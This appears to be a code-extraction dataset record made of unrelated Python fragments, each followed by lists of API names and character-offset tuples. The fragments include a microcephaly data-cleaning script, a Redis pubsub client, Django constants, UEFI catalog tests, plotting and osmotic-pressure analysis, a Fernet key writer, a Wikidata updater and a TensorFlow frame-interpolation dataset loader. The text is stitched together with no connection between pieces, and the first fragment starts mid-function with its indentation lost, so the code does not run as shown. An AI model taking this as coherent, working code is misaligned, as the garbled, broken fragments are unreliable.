bancoNovo['micro'] = list(micro)
banco['micro']=micro
bancoNovo['NV_TC_MICRO'] = list(banco.NV_TC_MICRO)
#sorologia
bancoNovo['NV_Storch'] =list(banco.lab_STORCH)
bancoNovo['NV_sifilis'] = list(banco.NV_SIFILIS)
bancoNovo['NV_TOXO'] = list(banco.NV_TOXO.replace(['IgG reagente','IgM reagente'],['Reagente','Reagente']))
bancoNovo['NV_CMV'] =list( banco.NV_CMV)
bancoNovo['NV_DENGUE']=list(banco.NV_DENGUE.replace(['IgG reagente','IgM reagente'],['Reagente','Reagente']))
bancoNovo['NV_CHIK']=list(banco.NV_CHIK)
count_storch = pd.Series([np.nan]*len(sexo))
for i in range(len(sexo)):
if len(bancoNovo.NV_sifilis[i].strip())>1:
count_storch[i]=1
if len(bancoNovo.NV_CMV[i].strip())>1:
if count_storch.isnull()[i]:
count_storch[i]=1
else:
count_storch[i]=count_storch[i]+1
if len(bancoNovo.NV_TOXO[i].strip())>1:
if count_storch.isnull()[i]:
count_storch[i]=1
else:
count_storch[i]=count_storch[i]+1
banco['count_storch'] = count_storch
bancoNovo['count_storch'] = list(count_storch)
#exames
bancoNovo['NV_USG_MICRO']=list(banco.NV_USG_MICRO)
bancoNovo['NV_TC_MICRO']=list(banco.NV_TC_MICRO)
bancoNovo['NV_RM_MICRO']=list(banco.NV_RM_MICRO)
bancoNovo['NV_USG_RESULT']=list(banco.NV_USG_RESULT)
bancoNovo['NV_TC_RESULT']=list(banco.NV_TC_RESULT)
bancoNovo['NV_RM_RESULT']=list(banco.NV_TC_RESULT)
texto = banco.NV_RM_CALC
texto = texto + ' ' + banco.NV_USG_CALC_DESC
texto = texto + ' ' + banco.NV_RM_CALC
texto = texto + ' ' + banco.NV_TC_CALC
texto = texto + ' ' + banco.NV_USG_OUTRO
texto = texto + ' ' + banco.NV_TC_OUTRO
texto = texto + ' ' + banco.NV_RM_OUTRO
texto = texto + ' ' + banco.NV_USG_VENTR
texto = texto + ' ' + banco.NV_TC_VENTR
texto = texto + ' ' + banco.NV_RM_VENTR
missImagem = pd.Series([np.nan]*len(sexo))
for i in range(len(sexo)):
if len(banco.NV_USG_RESULT[i].strip())<2 and len(banco.NV_TC_RESULT[i].strip())<2 and len(banco.NV_RM_RESULT[i].strip())<2 and len(texto[i].strip())<2:
missImagem[i] = 1
else:
missImagem[i] = 0
texto = texto + ' ' + banco.DS_OBSERVACOES_GERAIS
for i in range(len(texto)):
texto[i] = texto[i].strip().replace('.',' ').replace(';',' ').replace(',',' ').replace('?',' ').replace("'",' ').replace('=','').replace('-',' ').replace('+',' ').replace('/',' ').replace('(',' ').replace(')',' ').replace('<',' ').replace('>',' ').replace(':',' ').replace('&',' ').replace('¿',' ').replace('%',' ').replace('\n',' ').replace('"',' ').lower()
bancoNovo['missImagem'] = list(missImagem)
bancoNovo['casegr'] = list(banco.casegr)
bancoNovo['classFinal']=list(classFinal)
return texto,bancoNovo
texto,bancoNovo = gerarbanco()
bancoNovo['texto'] = list(texto)
# type class and save
typeClass= pd.Series([np.nan]*len(bancoNovo))
typeClass[bancoNovo.classFinal.isnull()==False]='rule'
typeClass[(typeClass.isnull()) & (bancoNovo.texto.str.strip()!='')]='group2'
typeClass[typeClass.isnull()]='group1'
bancoNovo['typeClass']=list(typeClass)
bancoNovo.to_csv('banco_total.csv') | [
"pandas.read_csv",
"pandas.DataFrame",
"pandas.read_stata"
] | [((170, 224), 'pandas.read_stata', 'pd.read_stata', (['"""Microcefalia MS analysis 20160609.dta"""'], {}), "('Microcefalia MS analysis 20160609.dta')\n", (183, 224), True, 'import pandas as pd\n'), ((237, 295), 'pandas.read_csv', 'pd.read_csv', (['"""circumference.csv"""'], {'sep': '""";"""', 'index_col': '"""sem"""'}), "('circumference.csv', sep=';', index_col='sem')\n", (248, 295), True, 'import pandas as pd\n'), ((355, 369), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (367, 369), True, 'import pandas as pd\n')] |
from redis import StrictRedis
class SentinelClient(object):
def __init__(self, url, db=None, name='default', health_check_interval=30):
"""create a redis client.
Args:
url: redis server url.
db: redis database, default 0.
name: client name, default 'default'.
health_check_interval: how many seconds to check whether the redis server is healthy.
"""
self.client = StrictRedis.from_url(
url=url,
db=db,
client_name=name,
health_check_interval=health_check_interval,
decode_responses=True
)
if __name__ == '__main__':
_client = SentinelClient(url='redis://localhost:26379')
_pub_sub = _client.client.pubsub()
_pub_sub.psubscribe('*')
for i in _pub_sub.listen():
print(i)
| [
"redis.StrictRedis.from_url"
] | [((452, 578), 'redis.StrictRedis.from_url', 'StrictRedis.from_url', ([], {'url': 'url', 'db': 'db', 'client_name': 'name', 'health_check_interval': 'health_check_interval', 'decode_responses': '(True)'}), '(url=url, db=db, client_name=name,\n health_check_interval=health_check_interval, decode_responses=True)\n', (472, 578), False, 'from redis import StrictRedis\n')] |
from django.utils.translation import ugettext_lazy as _
MALE = "m"
FEMALE = "f"
UNSPECIFIED = "-"
GENDERS = {(MALE, _("male")),
(FEMALE, _("female")),
(UNSPECIFIED, _("don't want to answer"))}
| [
"django.utils.translation.ugettext_lazy"
] | [((117, 126), 'django.utils.translation.ugettext_lazy', '_', (['"""male"""'], {}), "('male')\n", (118, 126), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((149, 160), 'django.utils.translation.ugettext_lazy', '_', (['"""female"""'], {}), "('female')\n", (150, 160), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((188, 213), 'django.utils.translation.ugettext_lazy', '_', (['"""don\'t want to answer"""'], {}), '("don\'t want to answer")\n', (189, 213), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import os
import logging
import unittest
from Uefi.Capsule.CatGenerator import *
#must run from build env or set PYTHONPATH env variable to point to the PythonLibrary folder
class CatGeneratorTest(unittest.TestCase):
def test_win10_OS(self):
o = CatGenerator("x64", "win10")
self.assertEqual(o.OperatingSystem, "10")
def test_10_OS(self):
o = CatGenerator("x64", "10")
self.assertEqual(o.OperatingSystem, "10")
def test_win10Server_OS(self):
o = CatGenerator("x64", "Server10")
self.assertEqual(o.OperatingSystem, "Server10")
def test_invalid_OS(self):
with self.assertRaises(ValueError):
CatGenerator("x64", "Invalid Junk")
def test_x64_arch(self):
o = CatGenerator("x64", "win10")
self.assertEqual(o.Arch, "X64")
def test_amd64_arch(self):
o = CatGenerator("amd64", "win10")
self.assertEqual(o.Arch, "X64")
def test_arm_arch(self):
o = CatGenerator("arm", "win10")
self.assertEqual(o.Arch, "ARM")
def test_arm64_arch(self):
o = CatGenerator("arm64", "win10")
self.assertEqual(o.Arch, "ARM64")
def test_aarch64_arch(self):
o = CatGenerator("aarch64", "win10")
self.assertEqual(o.Arch, "ARM64")
def test_invalid_arch(self):
with self.assertRaises(ValueError):
CatGenerator("Invalid Arch", "win10")
def test_invalid_pathtotool(self):
o = CatGenerator("amd64", "10")
with self.assertRaises(Exception) as cm:
o.MakeCat("garbage", os.path.join("c:", "test", "badpath", "inf2cat.exe"))
self.assertTrue(str(cm.exception).startswith("Can't find Inf2Cat on this machine."))
| [
"os.path.join"
] | [((1463, 1515), 'os.path.join', 'os.path.join', (['"""c:"""', '"""test"""', '"""badpath"""', '"""inf2cat.exe"""'], {}), "('c:', 'test', 'badpath', 'inf2cat.exe')\n", (1475, 1515), False, 'import os\n')] |
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple, Union, TypeVar, Iterable, Dict
from goa import problems
T = TypeVar("T")
def plot_population(
problem: problems.BaseProblem,
X: Union[T, Iterable[T]],
ax: plt.Axes = None,
c: str = "darkblue",
linestyle: str = ":",
marker: str = "X",
markersize: int = 6,
markevery: int = 2,
antialiased: bool = True,
figsize: Tuple[float, float] = (12, 8),
kwargs: Dict = None,
) -> plt.Axes:
knobs = dict()
if kwargs is not None:
knobs.update(kwargs)
if not ax:
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(projection="3d")
if X.shape == (2,):
X = [X]
for x, y in X:
ax.plot(
[x, x],
[y, y],
[problem(np.asarray([x, y])), 0],
c=c,
linestyle=linestyle,
marker=marker,
markersize=markersize,
markevery=markevery,
antialiased=antialiased,
**knobs
)
return ax
def root_mean_squared_error(
x: Union[float, np.ndarray], y: Union[float, np.ndarray]
) -> float:
return np.sqrt(np.mean(np.power(np.subtract(x, y), 2)))
def custom_init_view_function(
y: float = 20, x: float = 120, a: float = 30, b: float = 15
) -> Tuple[float, float]:
return a - np.cos(y) * b, x
| [
"numpy.subtract",
"numpy.asarray",
"matplotlib.pyplot.figure",
"numpy.cos",
"typing.TypeVar"
] | [((141, 153), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (148, 153), False, 'from typing import Tuple, Union, TypeVar, Iterable, Dict\n'), ((608, 635), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (618, 635), True, 'import matplotlib.pyplot as plt\n'), ((1210, 1227), 'numpy.subtract', 'np.subtract', (['x', 'y'], {}), '(x, y)\n', (1221, 1227), True, 'import numpy as np\n'), ((1372, 1381), 'numpy.cos', 'np.cos', (['y'], {}), '(y)\n', (1378, 1381), True, 'import numpy as np\n'), ((819, 837), 'numpy.asarray', 'np.asarray', (['[x, y]'], {}), '([x, y])\n', (829, 837), True, 'import numpy as np\n')] |
# Standard library
import os
from pathlib import Path
# Third party
from cryptography.fernet import Fernet
from dotenv import load_dotenv
# Constants
CRYPTO_KEY_ENV_VAR = 'CRYPTO_KEY'
ENV_VAR_EXIST = f'The {CRYPTO_KEY_ENV_VAR} environment variable already exist. Cannot continue as the crypto key may still be in use.'
ENV_VAR_PATH = Path.home() / '.my_python_env'
# Load virtual environmental variables
load_dotenv(dotenv_path=ENV_VAR_PATH)
def environment_var_exist():
return os.environ.get(CRYPTO_KEY_ENV_VAR)
def generate_key():
return Fernet.generate_key()
def write_key_env_var(crypto_key):
# Only write if environmental variable does not exist.
# Otherwise raise an exception - environment variable already exists.
if not environment_var_exist():
with ENV_VAR_PATH.open(mode='w') as file:
file.write(f'{CRYPTO_KEY_ENV_VAR}={crypto_key}')
else:
raise Exception(ENV_VAR_EXIST)
if __name__ == '__main__':
crypto_key = generate_key().decode()
write_key_env_var(crypto_key)
| [
"dotenv.load_dotenv",
"os.environ.get",
"cryptography.fernet.Fernet.generate_key",
"pathlib.Path.home"
] | [((408, 445), 'dotenv.load_dotenv', 'load_dotenv', ([], {'dotenv_path': 'ENV_VAR_PATH'}), '(dotenv_path=ENV_VAR_PATH)\n', (419, 445), False, 'from dotenv import load_dotenv\n'), ((337, 348), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (346, 348), False, 'from pathlib import Path\n'), ((487, 521), 'os.environ.get', 'os.environ.get', (['CRYPTO_KEY_ENV_VAR'], {}), '(CRYPTO_KEY_ENV_VAR)\n', (501, 521), False, 'import os\n'), ((554, 575), 'cryptography.fernet.Fernet.generate_key', 'Fernet.generate_key', ([], {}), '()\n', (573, 575), False, 'from cryptography.fernet import Fernet\n')] |
import csv
import config
import awb
infilename = config.datafolder+'wikidata/wdlid_ElhId.csv'
resourceitem = "Q19" #Q19: Elhuyar
#positem = "Q8" # Q7: substantibo, Q8: aditza
with open(infilename, encoding="utf-8") as csvfile:
sourcedict = csv.DictReader(csvfile)
lex_elh = {}
for row in sourcedict:
lex_elh[row['lexemeId'].replace("http://www.wikidata.org/entity/","")] = row['ElhId']
for awbid in awb.wdmappings:
wdid = awb.wdmappings[awbid]
if awbid.startswith('L') and wdid in lex_elh:
wdstatement = awb.updateclaim(awbid, "P1", wdid, "string")
quali = awb.setqualifier(awbid, "P1", wdstatement, "P7", lex_elh[wdid], "string")
| [
"csv.DictReader",
"awb.updateclaim",
"awb.setqualifier"
] | [((243, 266), 'csv.DictReader', 'csv.DictReader', (['csvfile'], {}), '(csvfile)\n', (257, 266), False, 'import csv\n'), ((516, 560), 'awb.updateclaim', 'awb.updateclaim', (['awbid', '"""P1"""', 'wdid', '"""string"""'], {}), "(awbid, 'P1', wdid, 'string')\n", (531, 560), False, 'import awb\n'), ((571, 644), 'awb.setqualifier', 'awb.setqualifier', (['awbid', '"""P1"""', 'wdstatement', '"""P7"""', 'lex_elh[wdid]', '"""string"""'], {}), "(awbid, 'P1', wdstatement, 'P7', lex_elh[wdid], 'string')\n", (587, 644), False, 'import awb\n')] |
import numpy as np
from casim.calculations import word_entropy
def test_word_entropy():
test_arr = np.array([1, 0, 0, 1, 1, 0, 1, 0])
assert np.round(word_entropy(test_arr, 3), decimals=1) == 2.5
| [
"casim.calculations.word_entropy",
"numpy.array"
] | [((105, 139), 'numpy.array', 'np.array', (['[1, 0, 0, 1, 1, 0, 1, 0]'], {}), '([1, 0, 0, 1, 1, 0, 1, 0])\n', (113, 139), True, 'import numpy as np\n'), ((161, 186), 'casim.calculations.word_entropy', 'word_entropy', (['test_arr', '(3)'], {}), '(test_arr, 3)\n', (173, 186), False, 'from casim.calculations import word_entropy\n')] |
import numpy as np
import matplotlib.pyplot as plt
import glob
from sys import argv
from os.path import exists as file_exists
methods = ['drude', 'c36']
mol1, mol2 = str(argv[1]), str(argv[2])
sysname = mol1+'_'+mol2
def blockavg(x,nblocks=30):
lblock = int(len(x)/nblocks)
m = []
for i in range(nblocks):
start = i*lblock
end = (i+1)*lblock
m.append(np.mean(x[start:end]))
m = np.array(m)
return np.mean(m), np.std(m)
for method in methods:
dirs = sorted(glob.glob('%s_at_*'%(method)))
if len(dirs) == 0:
continue
print(method.upper(),':',mol1.upper(),'-',mol2.upper())
osmp = []
f = open('OSMP_%s_%s_%s.dat'%(mol1,mol2,method), 'w')
f.write('# %8s %10s %10s\n'%('Conc (M)','OsmP (bar)','Error'))
print('# %8s %10s %10s'%('Conc (M)','OsmP (bar)','Error'))
for d in dirs:
c = d.split("_")[2]
r1 = np.loadtxt('%s/osmp.%s_%s_%s.1.dat'%(d,mol1,mol2,c))
r2 = np.loadtxt('%s/osmp.%s_%s_%s.2.dat'%(d,mol1,mol2,c))
r3 = np.loadtxt('%s/osmp.%s_%s_%s.3.dat'%(d,mol1,mol2,c))
r = np.concatenate((r1,r2,r3))/100000.0
m,s = blockavg(r[:,1])
print("%10.1f %10.3f %10.3f"%(float(c),m,s))
f.write("%10.1f %10.3f %10.3f\n"%(float(c),m,s))
osmp.append((float(c),m,s))
osmp = np.array(osmp)
f.close()
# plot
plt.figure()
plt.title(method.upper()+': '+mol1.upper()+' - '+mol2.upper())
plt.errorbar(osmp[:,0],osmp[:,1],yerr=osmp[:,2],marker='o',markersize=5,capsize=3)
plt.xlabel('Concentration (M)')
plt.ylabel('Osmotic Pressure (bar)')
plt.tight_layout()
plt.savefig('OSMP_%s_%s_%s.png'%(mol1,mol2,method))
plt.close()
if file_exists('OSMP_%s_%s_drude.dat'%(mol1,mol2)) and file_exists('OSMP_%s_%s_c36.dat'%(mol1,mol2)):
osmp_drude = np.loadtxt('OSMP_%s_%s_drude.dat'%(mol1,mol2))
osmp_c36 = np.loadtxt('OSMP_%s_%s_c36.dat'%(mol1,mol2))
plt.figure()
plt.title(mol1.upper()+' - '+mol2.upper())
plt.errorbar(osmp_drude[:,0],osmp_drude[:,1],yerr=osmp_drude[:,2],marker='o',markersize=5,capsize=3,label='drude')
plt.errorbar(osmp_c36[:,0],osmp_c36[:,1],yerr=osmp_c36[:,2],marker='o',markersize=5,capsize=3,label='c36')
plt.xlabel('Concentration (M)')
plt.ylabel('Osmotic Pressure (bar)')
plt.legend()
plt.tight_layout()
plt.savefig('OSMP_%s_%s_both.png'%(mol1,mol2))
plt.close()
| [
"matplotlib.pyplot.savefig",
"numpy.concatenate",
"numpy.std",
"matplotlib.pyplot.close",
"matplotlib.pyplot.legend",
"os.path.exists",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.array",
"numpy.loadtxt",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.errorbar"
] | [((420, 431), 'numpy.array', 'np.array', (['m'], {}), '(m)\n', (428, 431), True, 'import numpy as np\n'), ((1330, 1344), 'numpy.array', 'np.array', (['osmp'], {}), '(osmp)\n', (1338, 1344), True, 'import numpy as np\n'), ((1374, 1386), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1384, 1386), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1552), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp[:, 0]', 'osmp[:, 1]'], {'yerr': 'osmp[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)'}), "(osmp[:, 0], osmp[:, 1], yerr=osmp[:, 2], marker='o',\n markersize=5, capsize=3)\n", (1470, 1552), True, 'import matplotlib.pyplot as plt\n'), ((1545, 1576), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Concentration (M)"""'], {}), "('Concentration (M)')\n", (1555, 1576), True, 'import matplotlib.pyplot as plt\n'), ((1581, 1617), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Osmotic Pressure (bar)"""'], {}), "('Osmotic Pressure (bar)')\n", (1591, 1617), True, 'import matplotlib.pyplot as plt\n'), ((1622, 1640), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1638, 1640), True, 'import matplotlib.pyplot as plt\n'), ((1645, 1700), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('OSMP_%s_%s_%s.png' % (mol1, mol2, method))"], {}), "('OSMP_%s_%s_%s.png' % (mol1, mol2, method))\n", (1656, 1700), True, 'import matplotlib.pyplot as plt\n'), ((1701, 1712), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (1710, 1712), True, 'import matplotlib.pyplot as plt\n'), ((1717, 1767), 'os.path.exists', 'file_exists', (["('OSMP_%s_%s_drude.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_drude.dat' % (mol1, mol2))\n", (1728, 1767), True, 'from os.path import exists as file_exists\n'), ((1769, 1817), 'os.path.exists', 'file_exists', (["('OSMP_%s_%s_c36.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_c36.dat' % (mol1, mol2))\n", (1780, 1817), True, 'from os.path import exists as file_exists\n'), ((1833, 1882), 'numpy.loadtxt', 'np.loadtxt', (["('OSMP_%s_%s_drude.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_drude.dat' % (mol1, mol2))\n", (1843, 1882), True, 'import numpy as np\n'), ((1895, 1942), 'numpy.loadtxt', 'np.loadtxt', (["('OSMP_%s_%s_c36.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_c36.dat' % (mol1, mol2))\n", (1905, 1942), True, 'import numpy as np\n'), ((1944, 1956), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1954, 1956), True, 'import matplotlib.pyplot as plt\n'), ((2008, 2135), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp_drude[:, 0]', 'osmp_drude[:, 1]'], {'yerr': 'osmp_drude[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)', 'label': '"""drude"""'}), "(osmp_drude[:, 0], osmp_drude[:, 1], yerr=osmp_drude[:, 2],\n marker='o', markersize=5, capsize=3, label='drude')\n", (2020, 2135), True, 'import matplotlib.pyplot as plt\n'), ((2127, 2247), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp_c36[:, 0]', 'osmp_c36[:, 1]'], {'yerr': 'osmp_c36[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)', 'label': '"""c36"""'}), "(osmp_c36[:, 0], osmp_c36[:, 1], yerr=osmp_c36[:, 2], marker=\n 'o', markersize=5, capsize=3, label='c36')\n", (2139, 2247), True, 'import matplotlib.pyplot as plt\n'), ((2238, 2269), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Concentration (M)"""'], {}), "('Concentration (M)')\n", (2248, 2269), True, 'import matplotlib.pyplot as plt\n'), ((2274, 2310), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Osmotic Pressure (bar)"""'], {}), "('Osmotic Pressure (bar)')\n", (2284, 2310), True, 'import matplotlib.pyplot as plt\n'), ((2315, 2327), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2325, 2327), True, 'import matplotlib.pyplot as plt\n'), ((2332, 2350), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2348, 2350), True, 'import matplotlib.pyplot as plt\n'), ((2355, 2404), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('OSMP_%s_%s_both.png' % (mol1, mol2))"], {}), "('OSMP_%s_%s_both.png' % (mol1, mol2))\n", (2366, 2404), True, 'import matplotlib.pyplot as plt\n'), ((2406, 2417), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2415, 2417), True, 'import matplotlib.pyplot as plt\n'), ((443, 453), 'numpy.mean', 'np.mean', (['m'], {}), '(m)\n', (450, 453), True, 'import numpy as np\n'), ((455, 464), 'numpy.std', 'np.std', (['m'], {}), '(m)\n', (461, 464), True, 'import numpy as np\n'), ((507, 536), 'glob.glob', 'glob.glob', (["('%s_at_*' % method)"], {}), "('%s_at_*' % method)\n", (516, 536), False, 'import glob\n'), ((900, 957), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.1.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.1.dat' % (d, mol1, mol2, c))\n", (910, 957), True, 'import numpy as np\n'), ((966, 1023), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.2.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.2.dat' % (d, mol1, mol2, c))\n", (976, 1023), True, 'import numpy as np\n'), ((1032, 1089), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.3.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.3.dat' % (d, mol1, mol2, c))\n", (1042, 1089), True, 'import numpy as np\n'), ((389, 410), 'numpy.mean', 'np.mean', (['x[start:end]'], {}), '(x[start:end])\n', (396, 410), True, 'import numpy as np\n'), ((1101, 1129), 'numpy.concatenate', 'np.concatenate', (['(r1, r2, r3)'], {}), '((r1, r2, r3))\n', (1115, 1129), True, 'import numpy as np\n')] |
# Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataset creation for frame interpolation."""
from typing import Callable, Dict, List, Optional
from absl import logging
import gin.tf
import tensorflow as tf
def _create_feature_map() -> Dict[str, tf.io.FixedLenFeature]:
"""Creates the feature map for extracting the frame triplet."""
feature_map = {
'frame_0/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_0/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_0/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_0/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_1/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_1/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_2/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_2/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'path':
tf.io.FixedLenFeature((), tf.string, default_value=''),
}
return feature_map
def _parse_example(sample):
"""Parses a serialized sample.
Args:
sample: A serialized tf.Example to be parsed.
Returns:
dictionary containing the following:
encoded_image
image_height
image_width
"""
feature_map = _create_feature_map()
features = tf.io.parse_single_example(sample, feature_map)
output_dict = {
'x0': tf.io.decode_image(features['frame_0/encoded'], dtype=tf.float32),
'x1': tf.io.decode_image(features['frame_2/encoded'], dtype=tf.float32),
'y': tf.io.decode_image(features['frame_1/encoded'], dtype=tf.float32),
# The fractional time value of frame_1 is not included in our tfrecords,
# but is always at 0.5. The model will expect this to be specificed, so
# we insert it here.
'time': 0.5,
# Store the original mid frame filepath for identifying examples.
'path': features['path'],
}
return output_dict
def _random_crop_images(crop_size: int, images: tf.Tensor,
total_channel_size: int) -> tf.Tensor:
"""Crops the tensor with random offset to the given size."""
if crop_size > 0:
crop_shape = tf.constant([crop_size, crop_size, total_channel_size])
images = tf.image.random_crop(images, crop_shape)
return images
def crop_example(example: tf.Tensor, crop_size: int,
crop_keys: Optional[List[str]] = None):
"""Random crops selected images in the example to given size and keys.
Args:
example: Input tensor representing images to be cropped.
crop_size: The size to crop images to. This value is used for both
height and width.
crop_keys: The images in the input example to crop.
Returns:
Example with cropping applied to selected images.
"""
if crop_keys is None:
crop_keys = ['x0', 'x1', 'y']
channels = [3, 3, 3]
# Stack images along channel axis, and perform a random crop once.
image_to_crop = [example[key] for key in crop_keys]
stacked_images = tf.concat(image_to_crop, axis=-1)
cropped_images = _random_crop_images(crop_size, stacked_images, sum(channels))
cropped_images = tf.split(
cropped_images, num_or_size_splits=channels, axis=-1)
for key, cropped_image in zip(crop_keys, cropped_images):
example[key] = cropped_image
return example
def apply_data_augmentation(
augmentation_fns: Dict[str, Callable[..., tf.Tensor]],
example: tf.Tensor,
augmentation_keys: Optional[List[str]] = None) -> tf.Tensor:
"""Applies random augmentation in succession to selected image keys.
Args:
augmentation_fns: A Dict of Callables to data augmentation functions.
example: Input tensor representing images to be augmented.
augmentation_keys: The images in the input example to augment.
Returns:
Example with augmentation applied to selected images.
"""
if augmentation_keys is None:
augmentation_keys = ['<KEY>']
# Apply each augmentation in sequence
augmented_images = {key: example[key] for key in augmentation_keys}
for augmentation_function in augmentation_fns.values():
augmented_images = augmentation_function(augmented_images)
for key in augmentation_keys:
example[key] = augmented_images[key]
return example
def _create_from_tfrecord(batch_size, file, augmentation_fns,
crop_size) -> tf.data.Dataset:
"""Creates a dataset from TFRecord."""
dataset = tf.data.TFRecordDataset(file)
dataset = dataset.map(
_parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Perform data_augmentation before cropping and batching
if augmentation_fns is not None:
dataset = dataset.map(
lambda x: apply_data_augmentation(augmentation_fns, x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
if crop_size > 0:
dataset = dataset.map(
lambda x: crop_example(x, crop_size=crop_size),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.batch(batch_size, drop_remainder=True)
return dataset
def _generate_sharded_filenames(filename: str) -> List[str]:
"""Generates filenames of the each file in the sharded filepath.
Based on github.com/google/revisiting-self-supervised/blob/master/datasets.py.
Args:
filename: The sharded filepath.
Returns:
A list of filepaths for each file in the shard.
"""
base, count = filename.split('@')
count = int(count)
return ['{}-{:05d}-of-{:05d}'.format(base, i, count) for i in range(count)]
def _create_from_sharded_tfrecord(batch_size,
train_mode,
file,
augmentation_fns,
crop_size,
max_examples=-1) -> tf.data.Dataset:
"""Creates a dataset from a sharded tfrecord."""
dataset = tf.data.Dataset.from_tensor_slices(
_generate_sharded_filenames(file))
# pylint: disable=g-long-lambda
dataset = dataset.interleave(
lambda x: _create_from_tfrecord(
batch_size,
file=x,
augmentation_fns=augmentation_fns,
crop_size=crop_size),
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=not train_mode)
# pylint: enable=g-long-lambda
dataset = dataset.prefetch(buffer_size=2)
if max_examples > 0:
return dataset.take(max_examples)
return dataset
@gin.configurable('training_dataset')
def create_training_dataset(
batch_size: int,
file: Optional[str] = None,
files: Optional[List[str]] = None,
crop_size: int = -1,
crop_sizes: Optional[List[int]] = None,
augmentation_fns: Optional[Dict[str, Callable[..., tf.Tensor]]] = None
) -> tf.data.Dataset:
"""Creates the training dataset.
The given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
Args:
batch_size: The number of images to batch per example.
file: (deprecated) A path to a sharded tfrecord in <tfrecord>@N format.
Deprecated. Use 'files' instead.
files: A list of paths to sharded tfrecords in <tfrecord>@N format.
crop_size: (deprecated) If > 0, images are cropped to crop_size x crop_size
using tensorflow's random cropping. Deprecated: use 'files' and
'crop_sizes' instead.
crop_sizes: List of crop sizes. If > 0, images are cropped to
crop_size x crop_size using tensorflow's random cropping.
augmentation_fns: A Dict of Callables to data augmentation functions.
Returns:
A tensorflow dataset for accessing examples that contain the input images
'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a
dictionary of tensors.
"""
if file:
logging.warning('gin-configurable training_dataset.file is deprecated. '
'Use training_dataset.files instead.')
return _create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size)
else:
if not crop_sizes or len(crop_sizes) != len(files):
raise ValueError('Please pass crop_sizes[] with training_dataset.files.')
if crop_size > 0:
raise ValueError(
'crop_size should not be used with files[], use crop_sizes[] instead.'
)
tables = []
for file, crop_size in zip(files, crop_sizes):
tables.append(
_create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size))
return tf.data.experimental.sample_from_datasets(tables)
@gin.configurable('eval_datasets')
def create_eval_datasets(batch_size: int,
files: List[str],
names: List[str],
crop_size: int = -1,
max_examples: int = -1) -> Dict[str, tf.data.Dataset]:
